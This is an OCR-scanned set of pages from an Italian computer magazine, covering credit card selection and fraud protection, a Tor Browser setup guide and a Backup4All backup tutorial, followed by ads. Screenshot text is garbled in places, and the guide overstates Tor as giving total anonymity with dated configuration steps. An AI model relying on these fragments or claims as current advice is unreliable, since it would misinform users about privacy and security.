e quelle contactless, che non si inseriscono nei 
POS, ma scambiano informazioni tramite ra¬ 
diofrequenza con gli appositi lettori presenti 


nei punti vendita. Queste ultime sono le meno 
diffuse e fungono più che altro come borsellino 
elettronico per piccole spese. 

Convenienza e sicurezza 

Individuato il tipo di carta confacente alle pro¬ 
prie esigenze, bisogna valutare la diffusione del 
circuito di riferimento, tenendo conto che Visa e 
MasterCard sono le più accettate nel mondo, con 
un parterre di ben 31 milioni di negozi conven¬ 
zionati sul globo. Poi, una volta calcolate le spese 
di gestione, bisogna pensare alla sicurezza. 
Da questo p unto di vista, secondo la direttiva 
2007/64/CE entrata in vigore in Italia con il 
D.lgs. 11/2010, la responsabilità del titolare per 
le spese effettuate con carta dopo un furto e 
prima della comunicazione ali ente creditore, 
può arrivare a un tetto massimo di 150 euro. 
Nulla è dovuto oltre questa soglia, a meno che 
l'ente non comprovi la colpa del titolare. Inoltre, 
in seguito a questa normativa, tutti gli enti si 
sono dotati di servizi adeguati che permettono 
di bloccare una tessera smarrita 24 ore su 24. 
La stessa legge impone che nulla sia dovuto 
dal titolare, in caso di recesso dalla carta, né in 
termini di preavviso, né in termini di penali. 
Anzi, qualora si disdica prima della scadenza 
annuale e si sia versato il canone annuo, questo 
deve essere restituito per il periodo in cui si usu¬ 
fruirà del servizio. Infine, ancora più stringente 
la normativa sui pagamenti non in cifrò, che 
rich iede al momento della stipula del contratto 
il tasso di cambio e la data. Insomma, le carte di 
credito possono essere davvero uno strumento 
fidato per differenti profili di clienti. 


PROBLEMI COI TUOI 

Inutile negare che parte dello straordinario suc¬ 
cesso che, negli ultimi anni, il binomio Internet e 
carta di credito sta avendo è dovuto alla facilità 
e rapidità con cui è possibile procedere al sod¬ 
disfacimento dei nostri piccoli e grandi sogni. 
Persino in Italia, dove lo sviluppo del commercio 
elettronico procede a passo di lumaca, in molti 
hanno ormai scoperto l'irresistibile leggerezza 
della moneta elettronica. Guai, però, a negare 
che dietro alla facilità ed alla velocità con cui 
si effettuano pagamenti on -line possano na¬ 
scondersi insidie e frodi. Lo testimoniamo, del 
resto, le tante e-mail che riceviamo in redazione 
e che evidenziano il generale timore di truffe o 
che qualcosa vada storto durante un acquisto 
on-line. Come difendersi in caso di frodi? Come 
accorgersi che qualcuno ci sta truffando? Lo 
abbiamo chiesto a Guido Scorza, avvocato e 
Dottore di ricerca in informatica giuridica e 
diritto delle nuove tecnologie, e Marco Pierani, 
avvocato e responsabile Relazioni Istituzionali 
per Altroconsumo (www.altroconsumo.it). 

Win Magazine: Come difendersi se qualcosa va 
storto quando si effettuano pagamenti on-line? 
Guido Scorza: Cominciamo dal principio. L'uti¬ 
lizzo della carta di credito è disciplinato da un 
contratto che prevede - in modo più o meno 
puntuale - gli obblighi della società che l'ha 
emessa. Leggerlo - cosa che troppo poco spesso 
si fa con la dovuta attenzione - può risultare 
prezioso nel momento del bisogno giacché 


La carta di credito giusta? Ecco con 



▲ : Un servizio per amico 

■J | Avviamo il browser e digitiamo nella barra 
-r.u-V degli indirizzi: www.edmaster.it/url/1551. 
Caricata la pagina, bisogna decidere quanto si 
vuole spendere al mese e il tipo di rimborso. Ad 
esempio, il primo profilo è dedicato a chi spende 
poco e con carta prepagata. Il secondo a chi spen¬ 
de fino a 500€ con circuito Visa o MasterCard. 


4l II nostro profilo 

2 I II terzo profilo è per chi spende fino a 500C 
■~r~J e vuole rimborsare a piccole rate. La stessa 
modalità di rimborso, ma con spesa fino a 750€ è 
il quarto profilo. Infine, il quinto profilo è pensato 
per chi spende fino a 1000€ al mese e desidera 
una carta del circuito American Express. Facciamo 
clic, quindi, sul profilo più adatto a noi. 


Su misura! 

i 3 I Per chi non rientra nei profili predefiniti e 
-wf proposti dal portale, è possibile definire un 
budget di spesa, una tipologia di rimborso e il cir¬ 
cuito della carta secondo le proprie esigenze e 
preferenze. Per far ciò, è necessario accedere al 
configuratore, cuccando sull’ultimo profilo dispo¬ 
nibile, quello in colore grigio. 



































I Acquisti sicuri a prova di frode I 


Ti spio da PC e** 


ACQUISTI ON LINE? RISPONDE L'AVVOCATO 


contiene tutta una serie di preziose indicazioni 
sui soggetti ed i recapiti da utilizzare per bloccare 
la carta qualora si abbia sentore che qualcuno la 
sta utilizzando al posto nostro e per verificare se 
e quali garanzie la società emittente la carta di 
credito ci offre in caso di frode. 

WM: Ma che fare oltre a leggere il contratto? 

G.S.: Nelle frodi on-line il tempo è un fattore deter¬ 
minante sia per limitare i danni che per consentire 
alle forze dell'ordine l'identificazione di eventuali 
responsabili. 

La vera scommessa, dunque, è cercare di avve¬ 
dersi in tempo quasi reale se qualcosa va storto 
e, quindi, segnalare il più tempestivamente pos¬ 
sibile alla società emittente la carta di credito, 
alia polizia postale ed, eventualmente, anche alle 
altre competenti Autorità [n.d.r. Garante Privacy, 
Autorità per le Garanzie nelle comunicazioni e 
Autorità garante della concorrenza e del mercato] 
quanto accaduto. 

* 

WM: In che modo accorgerci, però, che qualcuno 
ci sta truffando? 

G.S.: Ormai la maggior parte degli istituti emet¬ 
tenti le carte di credito dispongono di servizi 
gratuiti o quasi che ci informano via SMS di ogni 
utilizzo della nostra carta di credito e/o delle sue 
credenziali. Se li attiviamo, qualora qualcun altro 
la utilizzi al posto nostro, saremo informati in 
tempo reale e potremo attivarci. Un altro modo 
semplice, economico ed efficace è consultare 


frequentemente il nostro estratto conto on-line e 
segnalare prima all'emittente della carta di credito 
e, quindi, eventualmente alla polizia postale e/o 
alla guardia di finanzia ogni anomalia. 

WM: E una volta che ci siamo accorti di essere stati 
truffati? Cosa fare? 

G.S.: Gli obiettivi sono due. Cercare di evitare che 
la società emittente la carta di credito ci addebiti la 
spesa fatta, attraverso la nostra carta, dal truffatore 
o, se questo è già accaduto, cercare di ottenere il 
rimborso dalla stessa società o - se identificato - 
da chi ci ha raggirato. 

Al riguardo è opportuno tenere presente che la 
prima è responsabile qualora abbia lasciato che 
terzi utilizzassero la nostra carta di credito senza 
sufficiente diligenza mentre il secondo lo è sem¬ 
pre, per il fatto stesso di aver usato soldi - ancorché 
elettronici - non suoi! Si alle carte di credito ed ai 
pagamenti online, quindi, ma con giudizio! 

A Marco Pierani di Altroconsumo chiediamo... 

WM: Cosa si può fare contro le frodi on-line attra¬ 
verso le carte di credito? 

Marco Pierani: Innanzitutto occorre dire che il 
timore, particolarmente inveterato tra ì consu¬ 
matori italiani, di essere truffati quando si usa la 
carta di credito sul Web è, per buona parte, privo 
di fondamento, nasce infatti un po'dalla poca 
dimestichezza con Internet, un po'dall'ignoranza 
rispetto alle tutele che, in questo caso, la legge 
prevede in favore del consumatore. 


WM:/n che senso? 

M.P.: L'art. 56 del Codice del Consumo stabili¬ 
sce che l'Istituto di emissione della carta debba 
riaccreditare al consumatore i pagamenti dei 
quali questi dimostri l'eccedenza rispetto al prezzo 
pattuito, ovvero l'effettuazione mediante l'uso 
fraudolento della propria carta di pagamento da 
parte del professionista o di un terzo. L'Istituto 
di emissione della carta ha poi diritto di adde¬ 
bitare al professionista le somme riaccreditate 
al consumatore. 

WM: Ok, ma se si incappa in una truffa cosa occorre 
fare? 

M.P.: È sempre buona regola tenere sotto controllo 
l'estratto conto della propria carta di credito e con¬ 
testare tempestivamente alla banca gli eventuali 
addebiti fraudolenti per ottenere il riaccredito. 
Per altro verso è consigliabile controllare sempre 
l'esistenza dei dati del venditore sui siti dove utiliz¬ 
ziamo la nostra carta di credito e, prima di digitare 
il numero della carta, verificare che in basso sul 
lato destro dello schermo appaia il lucchetto, 
simbolo del sistema di sicurezza. Infine, stampare 
sempre tutto quello che si sottoscrive inserendo il 
numero di carta. L'unica pecca in questo sistema è 
che per riavere i soldi indietro i tempi sono spesso 
troppo lunghi, anche sei mesi. Bisogna riconoscere 
anche che le banche aderenti a Patti Chiari si sono 
impegnate a restituire le somme in 15 giorni. Se 
qualcosa non va per il verso giusto rivolgersi alle 
associazioni di consumatori. 


ceglierla in base al nostro profilo 



^ Le opzioni generali 

^ ì Nella nuova schermata, scegliamo dal 
W menu Modalità di rimborso la tipologia di 
rimborso (a saldo, rateale, prepagata o indiffe¬ 
rente). Indicare quanto si pensa di spendere ogni 
mese con la carta nell’apposito campo. Scegliere 
poi il circuito preferito (Visa/Mastercard o Amex) 
e digitare il Plafond e il fido mensile. 


a ii Confronto completo 

jj | Per una profilazione migliore, cliccare sul 
SmmJ pulsante Confronto completo. Qui speci¬ 
ficare se si vuole richiedere la carta on-line, se 
si possiede un conto corrente bancario, se si è 
disposti ad aprirne uno per la carta e le altre infor¬ 
mazioni necessarie. Infine, selezioniamo se si vuo¬ 
le l’estratto conto on-line o cartaceo. 


a Ecco i risultati 

g I Premiamo Invio sulla tastiera del PC. Com- 
paiono le carte corrispondenti ai parametri 
impostati. In alcuni casi, si potrà richiedere on-line' 
la carta, cliccando su Vai al sito. Un clic sui pan¬ 
nelli colorati permette di visualizzare informazioni 
più specifiche. Il pannello laterale, consente poi di 
modificare i parametri di ricerca. 
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Paura di essere spiati? Con le nostre dritte e il software 

giusto possiamo navigare come fantasmi della Rete 


La maschera per 
essere anonimi 


Cosa ci Oi 
occorre 

SOFTWARE PER 
NAVIGARE ANONIMI 

TOR BROWSER 

Quanto coste: Gratuito 

Sito Internet- 

www.torprojectorg 


D iverse volte abbiamo affrontato il de¬ 
licato tema dell’anonimato sul Web: 
sempre più siti raccolgono, infatti, le 
nostre informazioni personali col rischio 
che vengano condivise in Rete. Come ben 
sappiamo, quando navighiamo siamo iden¬ 
tificati nel grande mare di Internet mediante 
un indirizzo IP univoco. È un po' come effet¬ 


tuare una chiamata: il destinatario (nel caso 
specifico il sito Web raggiunto) è in grado di 
conoscere il nostro numero (l’IP) ed eventual¬ 
mente localizzarci su una mappa geografica. 
E se riuscissimo a cambiare l’indirizzo IP, 
facendo perdere le nostre tracce in giro per il 
mondo? Se ci sembra fantascienza, sbagliamo 
di grosso: la soluzione c’è e si chiama Tor 


Browser, il software che permette in pochi che 
di navigare in maniera totalmente anonima 
perché non solo è in grado di nascondere il 
nostro indirizzo IP, ma addirittura anche di 
mascherare il traffico Internet generato dal 
browser stesso: in pratica, è come diventa¬ 
re davvero fantasmi della Rete! Scopriamo 
dunque come procedere. 



SEMPRE PRONTO 
ALL'USO 

Tor Browser Bundle è 
distribuito in versione 
portable: ciò vuol dire 
che possiamo tenerne 
sempre una copia sulla 
nostra inseparabile 
pendrive, pronto ad 
essere avviato su qual¬ 
siasi PC. Non dovremo 
installare nulla e la 
nostra configurazione 
personale viene co¬ 
munque salvata senza 
doverla rifare ad ogni 
avvio. Il nostro consi¬ 
glio è dunque sempre 
quello di tenere una 
copia di Tor Browser 
a portata di mano, 
specialmente in quelle 
situazioni un cui il pe¬ 
rìcolo è sempre dietro 
l'angolo: pensiamo, ad 
esempio, alle volte che 
potremmo collegarci 
ad un hot spot Wi-Fi 
pubblico o a reti senza 
fili prive di protezione, 
magari durante le no¬ 
stre vacanze in Italia e 
all'estero. 



Download del software 


B Dal Win CD - ROM scompattiamo l'archivio compresso 
TorBrowser.zip in una qualsiasi cartella del nostro 
disco rigido. Al termine, accedendo al contenuto di 
questa nuova directory, troveremo il file di installazione di Tor 
Browser. 



Connessione come clienti 


a Verrà così mostrato il pannello di controllo Vidalla: clic- 
chiamo subito sul pulsante Settings per cominciare a 
personalizzare le impostazioni del nostro nuovo proxy 
anonimo. Spostiamoci nella scheda Sharingeda qui selezionia¬ 
mo l'opzione Run ad a Client only. 


dt «w..*, 

N*m. 

UWnM nw U*a 

T«* 


U OM*Md 

M *H> 

iiAvmiuae 

C.KMU 4IU. 


ì_ «ueofKOT. 

é o*»* 

wnvmima 




JkfcK, 

uva vai j ma 




« (•«fcwPo’UMc 

uvovau mv 

Cjftelé * Me 



■a ti«fl Tea lf*M« 

. mÈmèmt 


mrcffis 1 *** 

3 Dwunimli 

Hi *«*•*» 

Mwicft 

H *<!•» 

;«U 

jfc Ih* gUfcd.lt). 



• 



Avviamo Tor Browser 

Clicchiamo due volte sul file tor-obfsproxy-browser- 
bundle-2. 3.12-4-en-US.exe: si tratta di un archivio > 
P autoestraente e quindi creerà una nuova cartella Tor 
Browser. Accediamo al suo contenuto e clicchiamo due volte sul 
file Start Tor Browser per avviare il software. 



Regole per il firewall 

a Se sul nostro PC è installato un firewall che lascia attive 
solo alcune porte, spostiamoci in Network e abilitiamo 
l’opzione My firewall only lets me connect to certain 
ports. Compiliamo il campo Allowed Ports inserendo quelle 
ammesse (nel caso in figura, I '80 e la 443). 


96 Win Magazine Speciali 
























































v 


1 La maschera per essere anonimi 1 

ri 

s 


IO 

d 

a 

PC 

1! 

f % 




Pot tardavi 40 

f;] Me»» Ihe Rotar tasaerv 

' 1M* * tonhgirace i 


Por»* dbectoy: ' 

* por» fan* «Trine \^rn^ m 


Una lingua più familiare 

La lingua predefinita per l'interfaccia utente di Vidalia è 
l'inglese. Per cambiarla, spostiamoci nella scheda Appe- 
arance (sempre presente in Settingsi e selezioniamo dal 
menu a tendina Language l’opzione Italiano. Possiamo inoltre 
cambiare lo stile grafico da Style. 
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Condividere è bello! 

Se vogliamo condividere la nostra rete (ed in particolare 
| l'indirizzo IP reale, che quindi verrà usato per qualcun'al- 
tro) con gli altri utilizzatori della rete Tor, spostiamoci in 
Condivisione e selezioniamo Aiuta gli utenti sotto censura a 
raggiungere la rete Tor. 


Stato 

Stato di avvio non nconoaouto 


Shortoit di Vidalia 


•!f 


Mostra la rete 


Configuratone del relaylng V 


Usa una nuova dentiti 


li Grafico cH'ampiezza di banda ; jt# Aiuto_Informazioni su 


impostazioni avanzate 

a Terminiamo la configurazione preliminare di Vidalia spo¬ 
standoci nella scheda Avanzato. Nella sezione Control¬ 
lo di Tor verifichiamo che sia attiva l'opzione Utilizzo di 
una connessione TCP (ControlPort) e selezioniamo Configura 
la porta di controllo automaticamente. 


E adesso si naviga... 

a i Clicchiamo sul pulsante OK per ritornare al Pannello di 
controllo Vidalia. Clicchiamo su Start Tor per provare a 
stabilire una nuova connessione nella rete anonima: 
l'operazione dura qualche secondo, al termine del quale si avvie¬ 
rà automaticamente Mozilla Firefox 






ANCHE PER 
LINUX E MAC 

Se, oltre al nostro ama¬ 
to Windows, utilizziamo 
anche una qualsiasi di¬ 
stribuzione GNU/Linux 
(come Ubuntu) o siamo 
in possesso di un Mac, 
possiamo difendere 
ugualmente il nostro 
anonimato. Raggiun¬ 
gendo infatti il sito Web 
www.torproject.org 
possiamo procedere al 
download di Tor Brow¬ 
ser anche per le altre 
piattaforme software. 

Il principio di funziona¬ 
mento e configurazione 
preliminare è pressoché 
identico. 


OCCHIO ALLA 
CONDIVISANE! 


Se abbiamo deciso di 
far parte di uno dei nodi 
della rete Tor, ovvero 
vogliamo condividere 
la nostra connessione 
con gli altri membri 
della Rete, forse è 
bene prestare un po' 
d'attenzione in più. In 
questo caso, infatti, il 
nostro reale indirizzo 
IP verrebbe condiviso 
con gran parte della 
rete Tor: spesso, per 
evitare di essere scova¬ 
ti, i malintenzionati si 
connettono al Web uti¬ 
lizzando questa tecnica. 
Nel commettere il reato 
telematico, qualcuno . 
potrebbe pur sempre 
risalire al nostro indi¬ 
rizzo IP e dimostrare 
la nostra estraneità ai 
fatti non sarebbe cosa 
da poco. 


... con Mozilla Firefox! 

La buona riuscita dell’operazione verrà confermata da 
un messaggio nella pagina aperta automaticamente in 
Firefox. Nel campo YourIP address appears to be com¬ 
pare l’indirizzo IP acquisito dalla rete Tor che è diverso da quello 
assegnatoci dal nostro Internet Provider. 



In giro per il mondo 

E tt Se vogliamo avere una chiara visione dello stato della 
jl nostra connessione, ritorniamo al Pannello di controllo 
w Vidalia e clicchiamo sul pulsante Mostra la rete appare 
l’intero percorso della nostra connessione che, come possiamo 
vedere, fa davvero il giro del mondo! 
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Ctì spio da PC 


I tuoi dati a prova di crash I 


Così metti al sicuro file e cartelle importanti e li ripristini 

subito in caso di improvvisi blocchi di sistema 


I tuoi dati a 
prova di crash 


Cosa ci 
occorre 

SOFTWARE PER IL 
BACKUP DEI DAT) 

BACKUP4ALL 
LITE 4.6 

Lo trovi su: MCD 
Quanto costa: Gratis 

Sito Internet: 

www.backup4all.com 


E ffettuare un period ico backup dei 
dati è un’operazione da compiere 
periodicamente per evitare brut¬ 
te sorprese. Documenti importanti, 
musica, video... se il nostro computer 
dovesse smettere di funzionare im¬ 
provvisamente, vuoi per un virus o per 
un malfunzionamentodi Windows, po¬ 


tremmo subire danni non indifferenti. 
L’unica soluzione è armarsi di pazienza 
e creare copie di sicurezza di tutto ciò 
che ci sta a cuore. Col programma giu¬ 
sto, però, questa procedura risulterà 
tutt'altro che noiosa, basteranno pochi 
clic per mettere i nostri dati al riparo 
da questi inconvenienti. Tutto quello 


che dobbiamo fare è installare Backu- 
p4All Lite 4.6, software commerciale 
che questo mese Win Magazine regala 
a tutti i suoi lettori. Basta una semplice 
registrazione gratuita del software, po¬ 
chi passi per impostare il primo backup 
e tutti i nostri dati saranno archiviati 
e protetti! 



Il seriale è servito via e-mail 


D Avviamo l’installer b4a-lite-winmag.msi (lo 
trovi sul Win CD-ROM) e seguiamo i semplici 
passi del wizard (premiamo Next per due vol¬ 
te, poi Complete e infine Instali e Finish). Nella pagina 
Web che si apre, inseriamo i nostri dati, un’e-mail e 
premiamo Send. Riceveremo un messaggio col seria¬ 
le del software: selezioniamolo e copiamolo (Ctrl+C). 



Registrazione e lingua 


Dati in cassaforte 


a Avviamo Backup4AII dal menu Starte clicchia- 
mo, adestra, Register. Nelcampo Registration 
namescriviamo WinMagazinee in Registration 
Aey incolliamo (Ctrl+V) il seriale ricevuto via e-mail. 
Cucchiamo Register e poi OK. Dal menu Tools/Options, 
impostiamo Selectlanguage su Italian (fta/y) e premia¬ 
mo OK per localizzare l’interfaccia in italiano. 


9 Giochiamo il pulsante Nuovo in alto a sinistra 
e, in Nome backup , assegniamo un nome al 
backup. Premiamo Sfoglia e indichiamo il per¬ 
corso in cui archiviarlo. Diamo OK e procediamo con 
Avanti. Giochiamo Aggiungi cartella e selezioniamo le 
cartelle di cui creare il backup (OK). Premiamo Salva e 
infine Salva ed Esegui 



Aggiornamento in un clic 

a Dopo il salvataggio, nella sezione Tuttii gruppi 
compare l’icona del backup creato. In caso 
modificassimo i file e volessimo aggiornarlo, 
selezioniamolo e cucchiamo Backup (possiamo anche 
aggiungere elementi al backup o modificarne criteri 
cliccandoci su col destro e selezionando Proprietà). 


Dati sotto esame 

In caso volessimo effettuare un ripristino del 
backup, è consigliabile effettuare un controllo 
d’integrità dei dati premendo sul pulsante Test 
in alto, selezionando il backup dall’elenco e premendo 
su Prova. Al termine, apparirà l’esito dell’operazione che 
ci conferma o meno l'integrità del backup. Diamo OK. 


Mai più perdite accidentali 

a Per effettuare l’operazione di ripristino in caso 
di perdita dei dati, selezioniamo l’icona del 
nostro backup e cucchiamo sul pulsante Ripri¬ 
stina. Lasciamo invariate tutte le opzioni che ci vengo¬ 
no proposte e procediamo cliccando su Finito. In pochi 
istanti tutti i file verranno recuperati! 
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vai su | 
TrovaViaggi.it, 
migliaia di offe 
di qualità a prezz 
imbattibili ti 


aspettano! 


Sei un 
e vuoi promuovere la tua 
struttura sul TrovaViaggi? 


Fai conoscere la tua attività a 
più di 10 milioni di viaggiatori! 

Collegati a www.trovaviaggi.it 

Clicca sul box "Scopri il TrovaViaggi" 
Segui le istruzioni e... in pochi click 
la tua struttura sarà online! 


'Uristipercaso è sempre più ricco e ti offre la possibilità 


di organizzare il tuo prossimo viaggio scegliendo tra 
le migliori Offerte speciali e Last minute proposti da 
Agenzie, Tour Operator, Hotel, B&B e Agriturismi. 

Cosa aspetti? Collegati a www.trovaviaggi.it 
e organizza la tua prossima vacanza! 


Continua la tua 
voglia di vacanze! 




agile, veloce. Potente. 
L'antivirus del futuro. Oggi 


ANTI VIRUS 


Diventa rivenditore m NOD32 

area rivenditori WWW.NOD32.IT/PARTNERS 


DISTRIBUTORE ESCLUSIVO PER L'ITALIA; FUTURE TIME S.R.L. - ROMA 
l’FR QUALSIASI INFORMAZIONE VISITA IL NOSTRO SITO VVI R WWW.NOD32.IT 


FUTURE Time 

tecnologie antivirus 



